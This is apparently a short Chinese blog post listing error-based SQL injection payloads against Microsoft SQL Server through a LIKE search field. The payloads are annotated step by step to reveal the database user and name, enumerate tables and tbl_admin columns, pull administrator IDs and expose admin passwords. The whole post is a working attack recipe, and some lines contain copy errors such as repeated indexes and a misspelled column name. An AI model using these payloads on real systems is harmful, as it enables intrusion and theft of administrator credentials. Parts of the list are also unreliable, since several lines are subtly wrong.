

     %'and user>0 and '%'=' //得到当前数据库账号     
     %'and db_name()>0 and '%'=' //得到当前数据库名  
     %'and (select count(*) from admin)>0 and '%'=' //返回错误页面,就说明没有admin这个表
     %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0)>0 and '%'=' //得到当前数据库的第一个表名

      %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange'))>0 and '%'=' //得到当前数据库的第二个表名
      %'and (select top 1 name from lvhuana3.dbo.sysobjects where xtype='u' and status>0 and name not in('codechange','oldpoint'))>0 and '%'=' //得到当前数据库的第三个表名



 %'and (select top 1 col_name(object_id ('tbl_admin'),1) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第一个列名c_employee_id
      %'and (select top 1 col_name(object_id ('tbl_admin'),2) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第二个列名c_employee_name
      %'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第三个列名c_password
      %'and (select top 1 col_name(object_id ('tbl_admin'),3) from tbl_admin)>0 and '%'=' //得到tbl_admin这个表里的第四个列名c_level
    %'and (select top 1 c_employee_id from tbl_admin)>0 and '%'=' //得到第一个管理员的id
    %'and (select c_employee_id from(select top 1 * from(select top 2 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第二个管理员的id
    %'and (select c_employee_id from(select top 1 * from(select top 3 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第三个管理员的id
    %'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第四个管理员的id
     %'and (select c_employee_id from(select top 1 * from(select top 4 * from tbl_admin order by 1)T order by 1 desc)S)>0 and '%'=' //得到第五个管理员的id
    c%'and (select top 1 c_c_password from tbl_admin)>0 and '%'=' //这个语句是暴出管理员密码


posted @ 2018-07-18 11:04  圆柱模板  阅读(1030)  评论(0编辑  收藏  举报